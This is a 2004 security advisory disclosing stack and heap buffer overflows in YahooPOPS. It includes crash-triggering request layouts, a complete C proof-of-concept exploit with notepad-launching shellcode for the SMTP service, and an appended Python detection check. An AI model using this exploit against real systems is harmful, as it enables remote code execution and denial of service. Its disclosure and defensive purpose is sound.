
| Subject: | [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS |
|---|---|
| Date: | 27 Sep 2004 08:36:46 -0000 |
Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004

Product: YahooPOPS!
Vendor URL: http://yahoopops.sourceforge.net
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows
Release Date: 27 September 2004
Vendor Status: Informed on 24 September 2004
Response: no response

Description:

YahooPOPs! is an application that provides POP3 access to Yahoo! Mail. It is available on the Windows, Linux, Solaris and Mac platforms. The application emulates a POP3 and SMTP server, which lets popular email clients such as Outlook, Netscape, Eudora and Mozilla download email from Yahoo! accounts. The latest version of this program is 0.6, released on 23 May 2004; over 120000 users have downloaded it so far.

Both the POP3 and SMTP services have buffer overflow vulnerabilities. A remote attacker can send a specific request to either service to cause a stack based buffer overflow, which could allow the attacker to execute arbitrary code or simply crash the service on a vulnerable system.

Details:

YahooPOPS 0.x has local SMTP and POP3 engines to send and receive emails. The SMTP service is not enabled by default; users can enable it in the software options.

A POP3 USER request with more than 180 bytes will start to corrupt the heap.

POP3 request (DoS attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready
[USER][180xA][BBBB]

As a result, EAX and ECX will be overwritten.

SMTP request: sending a request with more than 504 bytes will overwrite ESP and cause a stack based overflow.

Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
[504xA][BBBB]

As a result, the EIP register will be overwritten.

Proof of concept demo exploit for the YPOP! SMTP listener:

```c
#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
    static char overflow[1024];
    char ret_code[]="\x23\x9b\x02\x10";                      /* JMP ESP - libcurl.dll */
    char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";
    /* harmless code (tnx to snooq), will open notepad on the remote machine */
    char code[]=
        "\x33\xc0"               // xor eax, eax   (slight modification to move esp up)
        "\xb0\xf0"               // mov al, 0f0h
        "\x2b\xe0"               // sub esp, eax
        "\x83\xE4\xF0"           // and esp, 0FFFFFFF0h
        "\x55"                   // push ebp
        "\x8b\xec"               // mov ebp, esp
        "\x33\xf6"               // xor esi, esi
        "\x56"                   // push esi
        "\x68\x2e\x65\x78\x65"   // push 'exe.'
        "\x68\x65\x70\x61\x64"   // push 'dape'
        "\x68\x90\x6e\x6f\x74"   // push 'ton'
        "\x46"                   // inc esi
        "\x56"                   // push esi
        "\x8d\x7d\xf1"           // lea edi, [ebp-0xf]
        "\x57"                   // push edi
        "\xb8\x35\xfd\xe6\x77"   // mov eax, XXXX -> WinExec()      win2k(SP4)=0x7c4e9c1d
        "\xff\xd0"               // call eax
        "\x4e"                   // dec esi
        "\x56"                   // push esi
        "\xb8\xfd\x98\xe7\x77"   // mov eax, YYYY -> ExitProcess()  win2k(SP4)=0x7c4ee01a
        "\xff\xd0";              // call eax
    WSADATA wsaData;
    struct hostent *hp;
    struct sockaddr_in sockin;
    char buf[300], *check;
    SOCKET sockfd;
    int bytes;
    int plen, i;
    char *hostname;
    unsigned short port;

    if (argc <= 1) {
        printf("YPOPs! SMTP Overflow\n");
        printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
        printf("Usage: %s [hostname] [port]\n", argv[0]);
        printf("default port is 25 \n");
        exit(0);
    }
    printf("YPOPs! SMTP Overflow\n");
    printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");

    hostname = argv[1];
    if (argv[2])
        port = atoi(argv[2]);
    else
        port = atoi("25");

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) {
        fprintf(stderr, "Error setting up with WinSock v1.1\n");
        exit(-1);
    }
    hp = gethostbyname(hostname);
    if (hp == NULL) {
        printf("ERROR: Unknown host %s\n", hostname);
        exit(-1);
    }
    sockin.sin_family = hp->h_addrtype;
    sockin.sin_port = htons(port);
    sockin.sin_addr = *((struct in_addr *)hp->h_addr);

    /* socket() reports failure with INVALID_SOCKET, not SOCKET_ERROR */
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("ERROR: Socket Error\n");
        exit(-1);
    }
    if ((connect(sockfd, (struct sockaddr *) &sockin, sizeof(sockin))) == SOCKET_ERROR) {
        printf("ERROR: Connect Error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(-1);
    }
    printf("Connected to [%s] on port [%d], sending overflow....\n", hostname, port);

    /* wait for the SMTP service welcome; read one byte less than the buffer
       so the terminating NUL always fits */
    if ((bytes = recv(sockfd, buf, sizeof(buf) - 1, 0)) == SOCKET_ERROR) {
        printf("ERROR: Recv Error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    buf[bytes] = '\0';
    check = strstr(buf, "220");
    if (check == NULL) {
        printf("ERROR: NO response from SMTP service\n");
        closesocket(sockfd);
        WSACleanup();
        exit(-1);
    }

    /* NOP padding, then the payload, the JMP ESP address and the jump-back
       stub, terminated by a newline so the service treats it as one request */
    plen = 504 - sizeof(code);
    memset(overflow, 0, sizeof(overflow));
    for (i = 0; i < plen; i++) {
        strcat(overflow, "\x90");
    }
    strcat(overflow, code);
    strcat(overflow, ret_code);
    strcat(overflow, jump_back);
    strcat(overflow, "\n");

    if (send(sockfd, overflow, strlen(overflow), 0) == SOCKET_ERROR) {
        printf("ERROR: Send Error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(-1);
    }
    printf("Exploit Sent.\n");
    closesocket(sockfd);
    WSACleanup();
    return 0;
}
```

--------------------------------------------------------------------------

Vendor response: no response

Credits: This vulnerability has been discovered by Nima Majidi (nima_majidi@hat-squad.com)

The original advisory can be found at: http://www.hat-squad.com/en/000075.html
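The two sizes the advisory gives (a POP3 USER argument over 180 bytes, an SMTP request line over 504 bytes) are what a defender can key on until the service is patched or disabled. The check below is an added example, not part of the advisory or of YahooPOPs; it assumes the POP3 limit applies to the bytes after "USER " (matching the advisory's [USER][180xA][BBBB] request), and the sample capture it scans is constructed.

```python
POP3_PORT = 110
SMTP_PORT = 25
POP3_USER_MAX = 180   # advisory: a USER argument over 180 bytes corrupts the heap
SMTP_LINE_MAX = 504   # advisory: an SMTP request over 504 bytes overwrites ESP/EIP


def check_request(dst_port, line):
    """Return None if the client line is within the advisory's limits, otherwise
    a (rule_name, measured_length) tuple naming the threshold it exceeded.
    Assumption: the POP3 limit applies to the USER argument, i.e. the bytes
    after "USER ", which matches the advisory's [USER][180xA][BBBB] layout."""
    line = line.rstrip(b"\r\n")
    if dst_port == POP3_PORT:
        cmd, _, arg = line.partition(b" ")
        if cmd.upper() == b"USER" and len(arg) > POP3_USER_MAX:
            return ("yahoopops-pop3-user-oversized", len(arg))
    elif dst_port == SMTP_PORT:
        if len(line) > SMTP_LINE_MAX:
            return ("yahoopops-smtp-line-oversized", len(line))
    return None


def scan_capture(records):
    """records: iterable of (dst_port, raw_line). Returns a list of
    (record_index, rule_name, measured_length) for every line that should be
    dropped or alerted on; traffic within the limits produces nothing."""
    alerts = []
    for idx, (port, raw) in enumerate(records):
        hit = check_request(port, raw)
        if hit is not None:
            alerts.append((idx, hit[0], hit[1]))
    return alerts


# Constructed sample traffic, not a real capture. Record 2 mirrors the
# advisory's POP3 DoS request; record 5 is 517 bytes, comfortably past the
# SMTP limit; records 3 and 4 sit exactly on the limits and must pass, since
# the advisory says "more than" 180 and 504 bytes.
SAMPLE_CAPTURE = [
    (POP3_PORT, b"USER alice\r\n"),
    (POP3_PORT, b"PASS hunter2\r\n"),
    (POP3_PORT, b"USER " + b"A" * 180 + b"BBBB\r\n"),
    (POP3_PORT, b"USER " + b"A" * 180 + b"\r\n"),
    (SMTP_PORT, b"A" * 504 + b"\r\n"),
    (SMTP_PORT, b"A" * 517 + b"\n"),
    (SMTP_PORT, b"HELO mail.example.test\r\n"),
]
```

Running scan_capture(SAMPLE_CAPTURE) flags records 2 and 5 only; a USER line sent to port 25 is judged by the SMTP rule, not the POP3 one.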